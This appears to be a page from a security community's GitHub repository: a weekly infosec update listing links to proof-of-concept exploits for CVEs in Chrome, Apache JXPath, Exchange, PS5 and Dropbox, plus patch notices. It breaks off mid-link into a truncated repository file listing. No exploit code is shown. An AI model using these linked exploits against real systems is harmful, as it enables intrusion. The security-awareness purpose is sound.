<summary> PoC for CVE & Exploit (Total : 5+ new 0-day matter in this week and 4 imoprtant from CVE last week) :
> Every week we're tracking the recetly discovered Exploit and PoC for CVE.
</summary>
- [Poc CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)
- Target/Product: **Google Chrome**
- Affected Version: Poc maker calims "All" but CVE says version < 80.0.3987.149
- Solution : google-chrome-upgrade-latest
- Discription : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [PoC CVE-2022-41852(unoffical)](https://github.com/Warxim/CVE-2022-41852)
- Target/Product: **Apache**
- Discription : Remote Code Execution in JXPath Library. (For example, methods JXPathContext.getValue(path) and JXPathContext.iterate(path) are dangerous if you let user send input into the path parameter.) where CVE-2022-41852 allows attackers to execute code on the application server. You can read more about this [vulnerability here:](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)
- Important **Poc from Last Week** :
- [CVE-2022-41208-PoC](https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse)
- Target/Product: **Microsoft Exchage Server**
- Affected Version: <8.3.1
- Discription : ProxyNotShell – CVE-2022-40140 & CVE-2022-41082. Metasploit Framework implementation of zer?-day bug in Microsoft Exchage Server which leads to RCE.
- [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)
- Target/Product: **Microsoft Exchage Server**
- Discription : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.
- [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)
- [PS5-4.03-Kernel-Exploit](https://github.com/Cryptogenic/PS5-4.03-Kernel-Exploit)
- Target/Product: **PS5**
- Exploit support firmwares : 4.03, 4.50, 4.51
- Discription/Issue/Flaw : ??PS5 kernel exploit based on TheFlow's IPV6 Use-After-Free (UAF), which was reported on HackerOne. The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC with some changes to accommodate the annoying PS5 memory layout (for more see Research Notes section). It establishes an arbitrary read / (semi-arbitrary) write primitive. This exploit and its capabilities have a lot of limitations, and as such, it's mostly intended for developers to play with to reverse engineer some parts of the system.
- [DropBox-XPC-Exploit](https://github.com/Pwnrin/DropBox-XPC-Exploit)
- Target/Product: **Dropbox**
- Discription/Issue/Flaw : ??DropBox-XPC-Exploit (https://github.com/Pwnrin/DropBox-XPC-Exploit) is a exploit for PID Reuse and Logical Error in DropBox's XPC service.
</details>
---
## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 27th Sept-11th October 2022
Security Patched within a Week: # Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022).
featuring releases from Microsoft, Adove, Github, Cisco, Linux(Ubuntu, kali etc), Firefox etc.
CVE:ANALYSIS & POC: Cve-2022-34960, cve-2022-41218, HackerOne report #1672388- Gitlab, cve-2022–33987,
Cve-2022–36635 and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020
CVE POC (0-Day): Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,
Cve Collection of jQuery UI XSS Payloads, nuclei-templete for cve-2022–35405, An updated list of PoC's cve's,
PS5-4.03-Kernel-Exploit, cve-2022-41040, cve-2022-26726, cve-2022-30600, cve-2022-39197, cve-2021-29156 Exploit,
Cve-2022-30206, cve-2022-2992, cve-2022-41208, cve-2022-2274 and cve-2022-36804
---
## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 21th Sept-27th Sept 2022
Security Patched within a Week: Latest vulnerability that has been patched within a week(21th Sep-27th Sep 2022).
featuring releases from Apple, Google, Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc.
CVE:ANALYSIS & POC: CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, cve-2021-41653, CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.
CVE POC (0-Day): CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos poc,
CVE-2022-23743, Webshell - Open source project, Windows10 - Custom Kernel Signers.
<details>
<summary>
Security Patched within a Week:
</summary>
- Here’s a look at the Latest Security (Severity : Critical or High) that has been patched in a Week(21th Sep-27th Sep 2022) and We highly recommend upgrading or updating from the origional source.
- **WhatsApp** Security Advisories September Update : CVE-2022-36934(prior to v2.22.16.12) and CVE-2022-27492(prior to v2.22.16.2).
- **Node.js** Update Fixes High Severity Flaws : CVE-2022-32212, CVE-2022-32215 & CVE-2022-35256. (Affected v18.x, v16.x, and v14.x )
- Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages.
- **Ubuntu 22.04** : bind9, mako, tiff, linux-gkeop, python-oauthlib, linux-oem-5.17, linux-gcp, linux-gke, linux-raspi - Li, etc.
- **Ubuntu 20.04 LTS** & Ubuntu 18.04 LTS*: bind9, mako, tiff, libjpeg-turbo, vim, xen, etcd, linux-hwe-5.15/5.4, linux-lowlatency-hwe-5.15/5.4, linux, linux-aws, linux-aws-5.15/5.4 , linux-azure, linux-azure-5.15/5.4 , linux-kvm, linux-bluefield, linux-gkeop, linux-ibm, linux-ibm-5.4, linux-oracle, linux-oracle-5.4.
- **Microsoft** [Endpoint Configuration Manager Spoofing Vulnerability](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972)
- **Cisco** [NX-OS Software Border Gateway Protocol Denial of Service Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nxosbgp?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20NX-OS%20Software%20Border%20Gateway%20Protocol%20Denial%20of%20Service%20Vulnerability&vs_k=1)
- **Mozilla** Releases Security Updates for [Firefox 105](https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/), [Firefox ESR 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-41/), [Thunderbird 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-42/) & [Thunderbird 91.13.1](https://www.mozilla.org/en-US/security/advisories/mfsa2022-39/).
- **Jenkins** [Security Advisory 2022-09-21](https://www.jenkins.io/security/advisory/2022-09-21/).
- **Zoho** [ManageEngine Multiple Products Remote Code Execution Vulnerability CVE-2022-35405(CVSS score 9.8)](https://socprime.com/blog/cve-2022-35405-detection-cisa-warns-of-adversaries-leveraging-manageengine-rce-flaw/)
- **Sophos** [Firewall Code Injection Vulnerability CVE-2022-3236](https://www.helpnetsecurity.com/2022/09/26/cve-2022-3236/)
- **IBM** [Maximo Asset Management 7.6.1.1, 7.6.1.2, and 7.6.1.3 (CVE-2022-40616)](https://nvd.nist.gov/vuln/detail/CVE-2022-40616)
- **Adobe** [Bridge version 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability](https://helpx.adobe.com/security/products/bridge/apsb22-49.html)
</details>
<details>
<summary>
CVE Analysis & PoC(9):
</summary>
- [Analysis: CVE-2022-39197](https://securityonline.info/cve-2022-39197-critical-cobalt-strike-bug-could-lead-to-rce-attacks/)
- Title -> Critical Cobalt Strike bug could lead to RCE attacks.
- [PoC CVE-2022-39197](https://github.com/burpheart/cve-2022-39197)
- Affected Version : prior to 4.7.1.
- Discription/Issue/Flaw : The CVE-2022-39197 vulnerability exists in Cobalt Strike’s Beacon payload, which may allow an attacker to trigger XSS by setting a fake username in the Beacon configuration, thereby causing remote code execution on the CS Server.
- [Analysis: CVE-2022-36934 and CVE-2022-27492](https://nakedsecurity.sophos.com/2022/09/27/whatsapp-zero-day-exploit-news-scare-what-you-need-to-know/)
- Title -> WhatsApp “zero-day exploit” news scare – what you need to know
- Affected Version : Android prior to v2.22.16.12, Business for Android < v2.22.16.12, iOS < v2.22.16.12, Business for iOS < v2.22.16.12
- Discription/Issue/Flaw : CVE-2022-36934 (An integer overflow in version v2.22.16.12 could result in remote code execution in an established video call.) & CVE-2022-27492 (An integer underflow in v2.22.16.2 could have caused remote code execution when receiving a crafted video file.)
- [Analysis: CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208](https://blog.sonarsource.com/onedev-remote-code-execution/)
- Title -> Securing Developer Tools: **OneDev** Remote Code Execution.
- Affected Version : 7.2.9.
- Discription/Issue/Flaw : OneDev tool has various features such as code search, CI/CD and static code analysis and it is an alternative to GitHub, GitLab and Bitbucket and it is open text. In this article paul gerste discussed mentioned CVE ID.
- [Analysis: CVE-2022-40286](https://www.x86matt
gitextract_93rjh7w1/ ├── .github/ │ └── FUNDING.yml ├── .pdfs/ │ ├── INDEX │ ├── PT-V1.1.xmind │ └── web app penetration testing list.xlsx ├── API-HelpDesk/ │ └── Readme.md ├── Bugbounty/ │ ├── BB-FAQ/ │ │ ├── BB_FAQ.md │ │ ├── Domain-Information.md │ │ └── Readme.md │ ├── BBMindmap/ │ │ └── Readme.md │ ├── Readme.md │ ├── Table_of_Vulnerability.md │ ├── Website_inputs_testing.md │ ├── Wordlists/ │ │ ├── AllWordlists.md │ │ └── Readme.md │ ├── Wordlists.md │ ├── bugbounty-FAQ.md │ └── burpsuite.md ├── Burpsuite/ │ ├── Assets/ │ │ └── Readme.md │ ├── Readme.md │ └── protips.md ├── CONTRIBUTING.md ├── Contributors.md ├── CyberSecurityJobs/ │ ├── Careers │ ├── CoverLetter.md │ ├── CybersecuityDiscipline.md │ ├── For_Jobs.md │ ├── Intership_Advice.md │ ├── InterviewQA.md │ ├── Jobs.md │ ├── Readme.md │ ├── SalaryNegotiation.md │ ├── internships.md │ └── resume.md ├── ISO-HelpDesk/ │ └── Readme.md ├── LFI/ │ ├── Lfi.md │ ├── Lfitools.md │ └── Readme.md ├── Pentesting Cheatsheets/ │ ├── Readme.md │ └── cheetsheets.md ├── Pentesting-BugbountyINDEX.md ├── PentestingChecklist/ │ └── Readme.md ├── PentestingReports/ │ ├── PreEngagement.md │ ├── Readme.md │ └── pentestingvideos.md ├── Pentesting_for_Researchers/ │ ├── PTplatform.md │ ├── Pentest-Reports.md │ └── Readme.md ├── README.md ├── ResetCybersecuirty/ │ ├── CONTRIBUTING.md │ ├── CVE's/ │ │ ├── CVE_Assests/ │ │ │ ├── Beta.md │ │ │ └── Readme.md │ │ ├── POC_collecctions.md │ │ └── Readme.md │ ├── Readme.md │ ├── SupportedBy/ │ │ ├── CommunityEngagementPartners.md │ │ ├── SponserUs.md │ │ ├── Suggestions.md │ │ ├── Team&Contributors.md │ │ └── Understanding.md │ ├── WIUAsset/ │ │ ├── Contribute.md │ │ ├── Logs.md │ │ ├── Readme.md │ │ ├── WIU_Templete/ │ │ │ ├── WIU_Trail_Beginners.md │ │ │ ├── WIU_Trail_For_Professionals.md │ │ │ ├── WIU_v0.3.md │ │ │ ├── WIU_v0.4.md │ │ │ └── helpdesk-Github.md │ │ └── Weekly_Infosec_Update_Segment/ │ │ ├── Course_Review/ │ │ │ ├── CEH.md │ │ │ └── Readme.md │ │ ├── Future_updates.md │ │ ├── Readme.md │ │ └── Tools/ │ │ └── Readme.md │ ├── Weekly_Infosec_Update(WIU)/ │ │ ├── Weekly_Infosec_Update_00.md │ │ ├── Weekly_Infosec_Update_01.md │ │ ├── Weekly_Infosec_Update_02.md │ │ ├── Weekly_Infosec_Update_03.md │ │ ├── Weekly_Infosec_Update_04.md │ │ ├── Weekly_Infosec_Update_05.md │ │ ├── Weekly_Infosec_Update_06.md │ │ ├── Weekly_Infosec_Update_07.md │ │ ├── Weekly_Infosec_Update_08.md │ │ ├── Weekly_Infosec_Update_09.md │ │ ├── Weekly_Infosec_Update_10.md │ │ ├── Weekly_Infosec_Update_11.md │ │ └── Weekly_Infosec_Update_12.md │ └── code-of-conduct.md ├── Sqlinjection.md ├── cheetsheets/ │ ├── BurpSuiteCheetsheet.md │ ├── Nano.md │ ├── Readme.md │ ├── metasploitcheetsheet.md │ └── nmapcheetsheet.md ├── enterprises.md └── license
Condensed preview — 94 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (875K chars).
[
{
"path": ".github/FUNDING.yml",
"chars": 84,
"preview": "# These are supported funding model platforms\n\ncustom: https://paypal.me/Vicky481\n\n\n"
},
{
"path": ".pdfs/INDEX",
"chars": 1359,
"preview": "** ** [Resources Mindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)\n/Resources/b"
},
{
"path": "API-HelpDesk/Readme.md",
"chars": 1383,
"preview": "# Here's 23 free ways to learn about API security testing: by Hany Soliman\n\n1. Video: Traceable AI, API Hacking 101.\n2. "
},
{
"path": "Bugbounty/BB-FAQ/BB_FAQ.md",
"chars": 1513,
"preview": "# BUG BOUNTY FAQ - freqently asked questions (Beginners friendly - Under Development)\nNote: Contents inside the **RESETH"
},
{
"path": "Bugbounty/BB-FAQ/Domain-Information.md",
"chars": 5892,
"preview": "## Domain Information :\n\n- Find Acquisition(google 6 month rule), ASNS, reversewhois, (Identifying IPs and main TLDS)\n "
},
{
"path": "Bugbounty/BB-FAQ/Readme.md",
"chars": 1007,
"preview": "##### For every bug bounty hunter, keep these things in mind when you are reporting any vulnerability\n\n- 1-Report should"
},
{
"path": "Bugbounty/BBMindmap/Readme.md",
"chars": 1348,
"preview": "## This folder contails mutiple Bugbounty Mindmap curated by all the amazing bughunters. \nUse it as inspiration for crea"
},
{
"path": "Bugbounty/Readme.md",
"chars": 5643,
"preview": "# Bug Bounty Helpdesk(Under Development)\n\n > Note: Contents inside the **RESETHACKER Community** are to help our commun"
},
{
"path": "Bugbounty/Table_of_Vulnerability.md",
"chars": 2374,
"preview": "**Writeups** : Vulnerability cheetsheets\nThis file contains the detailed write up on cheetsheets, Reports, Disclosure, e"
},
{
"path": "Bugbounty/Website_inputs_testing.md",
"chars": 340,
"preview": "Index | Topics\n---|---\n**1** Bozhidar Bozhanov | [User Authentication Best Practices Checklist](https://dzone.com/articl"
},
{
"path": "Bugbounty/Wordlists/AllWordlists.md",
"chars": 6694,
"preview": "# Top Recommended wordlists available for red pentesting, bugbounty and password bruteforcing❤️😳 \n\n#### Perpose : This r"
},
{
"path": "Bugbounty/Wordlists/Readme.md",
"chars": 214,
"preview": "TODO : \n1. Create a wordlist based on Backend technology and add a Readme.md to summurize that Technology.\n2. And Create"
},
{
"path": "Bugbounty/Wordlists.md",
"chars": 3733,
"preview": "# Bruteforce Wordlists\nIndex | wordlists\n-- | --\n\n▫️ | [SecLists](https://github.com/danielmiessler/SecLists)\n\n▫️ | [Fuz"
},
{
"path": "Bugbounty/bugbounty-FAQ.md",
"chars": 1764,
"preview": "# BUG BOUNTY FAQ - freqently asked questions (Beginners friendly - Under Development)\nNote: Contents inside the **RESETH"
},
{
"path": "Bugbounty/burpsuite.md",
"chars": 3951,
"preview": "\n\n# Burp Suite for Pentester\n\nIndex | title\n-- | --\n**0**. [Burpsuite - Getting Started, configure, recon setup and unde"
},
{
"path": "Burpsuite/Assets/Readme.md",
"chars": 1,
"preview": "\n"
},
{
"path": "Burpsuite/Readme.md",
"chars": 8910,
"preview": "Credit: Vikram -team ResetHacker\n\n**Q: What is Burp and why is it important for penetration testing?**\n\n Web applicatio"
},
{
"path": "Burpsuite/protips.md",
"chars": 2099,
"preview": "# Pro Tips for Bupsuite\n\n[Author b1twis3](http://b1twis3.ca/burpsuite-30-pro-tips/) | #BurpSuiteTips\n\n## Sample : \n**[1/"
},
{
"path": "CONTRIBUTING.md",
"chars": 698,
"preview": "# Contribution Guidelines\n\nPlease note that this project is released with a [Contributor Code of Conduct](code-of-conduc"
},
{
"path": "Contributors.md",
"chars": 96,
"preview": "# Contributors\n\nWe are very grateful to the following people have contributed to this project.\n\n"
},
{
"path": "CyberSecurityJobs/Careers",
"chars": 2699,
"preview": "1. | [cyber-security-careers/](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)\n\n# Securit"
},
{
"path": "CyberSecurityJobs/CoverLetter.md",
"chars": 3839,
"preview": "# Cover letter tips for Cybersecurity Jobs :\n \n 1. Highlight your experience\n 2. Show your passion for the job and talk "
},
{
"path": "CyberSecurityJobs/CybersecuityDiscipline.md",
"chars": 3699,
"preview": "\nAfter Reading this I hope this will help you in understanding which disciplines best fit your abilities, experience, an"
},
{
"path": "CyberSecurityJobs/For_Jobs.md",
"chars": 4289,
"preview": "**For Job** :\n\n- 1. Understand domain & choose your Goal.\n- 2. Find your Mentor.\n- 3. Validate your Career and Goal with"
},
{
"path": "CyberSecurityJobs/Intership_Advice.md",
"chars": 3328,
"preview": "## 1. Internship \n[Advise by iamthefrogy](https://github.com/iamthefrogy)\n \n Shall I go for an internship in any compa"
},
{
"path": "CyberSecurityJobs/InterviewQA.md",
"chars": 2601,
"preview": "0. All for one - interview questions - https://drive.google.com/drive/folders/17Brt0bx__E5Dd7PeR_09wPylidpDFZ7M?usp=shar"
},
{
"path": "CyberSecurityJobs/Jobs.md",
"chars": 6606,
"preview": "## Table of Contents for Jobs\n\n- [0. Weekly_Cybersecurity Hiring](#0-weekly-cybersecurity-hiring-october-2022)\n- [1. Typ"
},
{
"path": "CyberSecurityJobs/Readme.md",
"chars": 4170,
"preview": "Welcome to [Resthacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER) :)\n\n[![IT Job Helpdesk]("
},
{
"path": "CyberSecurityJobs/SalaryNegotiation.md",
"chars": 953,
"preview": "NOTE: Percentage of people that don't negotiate their salary are very high but If everything goes really smooth then you"
},
{
"path": "CyberSecurityJobs/internships.md",
"chars": 74,
"preview": "[Cybersecurity internship for Women](https://www.dsci.in/cyber-shikshaa/)\n"
},
{
"path": "CyberSecurityJobs/resume.md",
"chars": 2175,
"preview": "Index | Topics\n-- | --\n**1** | Resume Writing & Advise\n**2** | LinkedIn – Why create a quality profile?\n\n\n## 1. Resume W"
},
{
"path": "ISO-HelpDesk/Readme.md",
"chars": 308,
"preview": "# ISO HELPDESK\n\n**1** [This article discusses \"NIST Cybersecurity Framework vs ISO 27001/27002 vs NIST 800-53 vs Secure "
},
{
"path": "LFI/Lfi.md",
"chars": 38,
"preview": "\n\nhttps://github.com/g0tmi1k/LFISuite\n"
},
{
"path": "LFI/Lfitools.md",
"chars": 102,
"preview": "**LFI Tools**\n\n\nIndex | LFI Tools\n---|---\n**1** | [LFISuits](https://github.com/D35m0nd142/LFISuite)\n\n"
},
{
"path": "LFI/Readme.md",
"chars": 291,
"preview": "**LFI(Local File Inclusion )**\n\n\nIndex | Content\n---|---\n**1** | [LFI Documentation]()\n**2** | [LFI Practice labs]()\n**3"
},
{
"path": "Pentesting Cheatsheets/Readme.md",
"chars": 370,
"preview": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\n**1** I-red Team | [Pentesting Cheatsheets]( https://www.ired.team/offe"
},
{
"path": "Pentesting Cheatsheets/cheetsheets.md",
"chars": 1277,
"preview": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\nChris Dale | [BurpSuite Cheatsheet v1.0](Pentesting Cheatsheets/cheetsh"
},
{
"path": "Pentesting-BugbountyINDEX.md",
"chars": 1649,
"preview": "[ResourcesMindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)\n\nPentesting-Bugboun"
},
{
"path": "PentestingChecklist/Readme.md",
"chars": 1156,
"preview": "# Checklist\nAuthor | Checklist\n-- | --\n**1** six2dez | [Pentesting Web checklist](https://six2dez.gitbook.io/pentest-boo"
},
{
"path": "PentestingReports/PreEngagement.md",
"chars": 11983,
"preview": "# Pre-engagement: \nHelp yourself to get your 1st Pentesting client and prepare yourself for client meeting?\n\n ## UNDE"
},
{
"path": "PentestingReports/Readme.md",
"chars": 4106,
"preview": "Note: Contents inside the **RESETHACKER** is to help the community and all\nThe content belongs to the respective authors"
},
{
"path": "PentestingReports/pentestingvideos.md",
"chars": 1270,
"preview": "Index | Pentest Videos\n-- | --\n \n**1** | [Pentest Reporting and Best Practices -HackerOne](https://www.youtube.com/"
},
{
"path": "Pentesting_for_Researchers/PTplatform.md",
"chars": 1595,
"preview": "## FREE LABS TO TEST YOUR PENTEST/CTF SKILLS 👩💻👀\n\nIndex | Websites\n-- | --\n- | [SANS Challenger](http://www.smashthesta"
},
{
"path": "Pentesting_for_Researchers/Pentest-Reports.md",
"chars": 844,
"preview": "[𝗙𝗥𝗘𝗘 𝗥𝗘𝗦𝗢𝗨𝗥𝗖𝗘𝗦 / 𝗣𝗘𝗡𝗧𝗘𝗦𝗧 𝗥𝗘𝗣𝗢𝗥𝗧] - By @Gabrielle_BGB\n\nWant to upgrade your reporting skills?\nCheck out these resources\n"
},
{
"path": "Pentesting_for_Researchers/Readme.md",
"chars": 5290,
"preview": "# PEN TESTERS (Under Development)\n1. Company have PEN TESTERS team to conduct pentesting.\n2. Company HIRING PEN TEST SER"
},
{
"path": "README.md",
"chars": 32158,
"preview": "## Let's crowdsource our infosec learning with [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-"
},
{
"path": "ResetCybersecuirty/CONTRIBUTING.md",
"chars": 1881,
"preview": "# Contribution Guidelines\n\nPlease note that this project is released with a **No Code or Low Code contribution**. \n\nCont"
},
{
"path": "ResetCybersecuirty/CVE's/CVE_Assests/Beta.md",
"chars": 91951,
"preview": "# Security Patched, CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pe"
},
{
"path": "ResetCybersecuirty/CVE's/CVE_Assests/Readme.md",
"chars": 70733,
"preview": "# Security Patched, CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pe"
},
{
"path": "ResetCybersecuirty/CVE's/POC_collecctions.md",
"chars": 193,
"preview": "- SkyLink\n- Red Teaming TTPs // Developing a POC for CVE-2022-26923 with Powershell and CommandoVM - https://youtu.be/z8"
},
{
"path": "ResetCybersecuirty/CVE's/Readme.md",
"chars": 107823,
"preview": "# Security Patched, CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pe"
},
{
"path": "ResetCybersecuirty/Readme.md",
"chars": 9984,
"preview": "# WEEKLY INFOSEC UPDATE : v0.7\n \n- An initiative by [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Wha"
},
{
"path": "ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md",
"chars": 3535,
"preview": "## [Weekly_Infosec_Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty) C"
},
{
"path": "ResetCybersecuirty/SupportedBy/SponserUs.md",
"chars": 3364,
"preview": "( Note :Currently We're not looking for any Sponsership. Thank you)\n\n# Sponsor & Support\nGrow your brand, generate leads"
},
{
"path": "ResetCybersecuirty/SupportedBy/Suggestions.md",
"chars": 1681,
"preview": "# Sugestions & Probelm:\n\n1. Make it more organized or Easy to read.\n2. TL;DR or Small summury to the article would be re"
},
{
"path": "ResetCybersecuirty/SupportedBy/Team&Contributors.md",
"chars": 2460,
"preview": "## WEEKLY INFOSEC UPDATE : v0.3\n\n![]("
},
{
"path": "ResetCybersecuirty/SupportedBy/Understanding.md",
"chars": 6046,
"preview": "# Understanding community Operation and contributions:\n\nProject: **Weekly Inofsec update**\n\nProblem We're solving ? \nWe "
},
{
"path": "ResetCybersecuirty/WIUAsset/Contribute.md",
"chars": 4292,
"preview": "## India Centric Crowdsource InfoSec Community that make sence to Wrold.\n\n## Contribute & Give back to community | Crowd"
},
{
"path": "ResetCybersecuirty/WIUAsset/Logs.md",
"chars": 1870,
"preview": "# Log Book \n- 8/12/2022 : Added \"Bug Hunters Segment and Hackerone Reports Segment\" section inside \"Vulenrabilty/bugs Re"
},
{
"path": "ResetCybersecuirty/WIUAsset/Readme.md",
"chars": 11,
"preview": "Working On\n"
},
{
"path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_Trail_Beginners.md",
"chars": 15172,
"preview": "## Weekly Infosec Update - Beginners Friendly \n\n<details> \n<summary><b>\n📰📰📰 Community Infused NEWS 📰📰📰 </b></summary> "
},
{
"path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_Trail_For_Professionals.md",
"chars": 24080,
"preview": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Thing"
},
{
"path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_v0.3.md",
"chars": 23236,
"preview": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 04 (23rd - 30th Aug "
},
{
"path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_v0.4.md",
"chars": 1540,
"preview": "### This week we have made some changes in New version of \"Weekly Security Update\" v0.4\n\n1. Added nevigation Bar (called"
},
{
"path": "ResetCybersecuirty/WIUAsset/WIU_Templete/helpdesk-Github.md",
"chars": 2407,
"preview": "<h3 align=\"center\">Github HelpDesk & and Documentaion </h3>\n\n<h3 align=\"center\">Want to contribute to this project?"
},
{
"path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Course_Review/CEH.md",
"chars": 2579,
"preview": "ResetHacker Community : Course Reviews\n\nDISCLAIMER: These are ResetHacker members personal opinions and fellings! Make y"
},
{
"path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Course_Review/Readme.md",
"chars": 3353,
"preview": "ResetHacker Community : Course Reviews\n\nDISCLAIMER: These are ResetHacker members personal opinions and fellings! Make y"
},
{
"path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Future_updates.md",
"chars": 661,
"preview": "# Community Requirenment, Suggestion and feedback :\n\n- Newsletter in TLDR formate.\n- Move to website.\n\n## Bugbounty\n- Pa"
},
{
"path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Readme.md",
"chars": 1,
"preview": "\n"
},
{
"path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Tools/Readme.md",
"chars": 7903,
"preview": "## Weekly Cybersecurity 01 : v0.2\n**Date : 2nd - 23rd Aug 2022\n\n\n\n### Projects, Tools, RAT's And Ransomeware **\n*Misc To"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_00.md",
"chars": 10210,
"preview": "# Weekly Cybersecurity update 00: v0.1\nIdea is to give back to community and save time(because time is valuable) with HI"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_01.md",
"chars": 11895,
"preview": "## v0.2 Weekly Cybersecurity 01 \n\n **Current Issue date : 9th August 2022 : 7:00am**\n \n Last Issue date : 2 Aug "
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_02.md",
"chars": 16829,
"preview": "## Weekly infosec Update 02 \n\n **Issue date : 16th August 2022 : 7:00am**\n \n Last Issue date : 2nd Aug 2022 : 7:"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_03.md",
"chars": 15802,
"preview": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 03 (16th - 22nd Aug "
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_04.md",
"chars": 23236,
"preview": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 04 (23rd - 30th Aug "
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_05.md",
"chars": 25891,
"preview": " #### Hey Hackers, I hope you’ve been doing well on weekend! \n Here are the Agenda for \"Weekly infosec Update\" v0.4 (31t"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_06.md",
"chars": 25714,
"preview": " #### Hey Hackers, I hope you’ve been doing well on weekend! and quote Of Week is \"Don't rush the Process. Good Things T"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_07.md",
"chars": 26342,
"preview": " #### Hey Hackers, I hope you’ve been doing well on weekend! and quote of Week is \"Don't rush the Process. Good Things T"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_08.md",
"chars": 22243,
"preview": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Thing"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_09.md",
"chars": 33176,
"preview": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Thing"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_10.md",
"chars": 30443,
"preview": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Thing"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_11.md",
"chars": 30638,
"preview": "#### Hey Hackers, I hope you have all enjoyed your Diwali celebrations!! \n > Here are the agenda for *Weekly infosec Upd"
},
{
"path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_12.md",
"chars": 30225,
"preview": "#### Hey Hackers, I hope you have all enjoyed your Weekend!! \n\n > Here are the agenda for Weekly infosec Update v0.7 : 2"
},
{
"path": "ResetCybersecuirty/code-of-conduct.md",
"chars": 3240,
